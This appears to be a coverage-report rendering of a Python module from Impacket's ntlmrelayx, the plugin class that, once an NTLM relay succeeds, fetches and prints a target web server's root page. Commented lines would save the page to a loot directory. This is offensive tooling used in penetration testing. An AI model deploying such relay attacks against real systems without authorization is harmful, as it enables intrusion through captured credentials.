Hide keyboard shortcuts

Hot-keys on this page

r m x p   toggle line displays

j k   next/prev highlighted chunk

0   (zero) top of page

1   (one) first highlighted chunk

1# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. 

2# 

3# This software is provided under under a slightly modified version 

4# of the Apache Software License. See the accompanying LICENSE file 

5# for more information. 

6# 

7# HTTP Attack Class 

8# 

9# Authors: 

10# Alberto Solino (@agsolino) 

11# Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com) 

12# 

13# Description: 

14# HTTP protocol relay attack 

15# 

16# ToDo: 

17# 

18from impacket.examples.ntlmrelayx.attacks import ProtocolAttack 

19 

20PROTOCOL_ATTACK_CLASS = "HTTPAttack" 

21 

22class HTTPAttack(ProtocolAttack): 

23 """ 

24 This is the default HTTP attack. This attack only dumps the root page, though 

25 you can add any complex attack below. self.client is an instance of urrlib.session 

26 For easy advanced attacks, use the SOCKS option and use curl or a browser to simply 

27 proxy through ntlmrelayx 

28 """ 

29 PLUGIN_NAMES = ["HTTP", "HTTPS"] 

30 def run(self): 

31 #Default action: Dump requested page to file, named username-targetname.html 

32 

33 #You can also request any page on the server via self.client.session, 

34 #for example with: 

35 self.client.request("GET", "/") 

36 r1 = self.client.getresponse() 

37 print(r1.status, r1.reason) 

38 data1 = r1.read() 

39 print(data1) 

40 

41 #Remove protocol from target name 

42 #safeTargetName = self.client.target.replace('http://','').replace('https://','') 

43 

44 #Replace any special chars in the target name 

45 #safeTargetName = re.sub(r'[^a-zA-Z0-9_\-\.]+', '_', safeTargetName) 

46 

47 #Combine username with filename 

48 #fileName = re.sub(r'[^a-zA-Z0-9_\-\.]+', '_', self.username.decode('utf-16-le')) + '-' + safeTargetName + '.html' 

49 

50 #Write it to the file 

51 #with open(os.path.join(self.config.lootdir,fileName),'w') as of: 

52 # of.write(self.client.lastresult)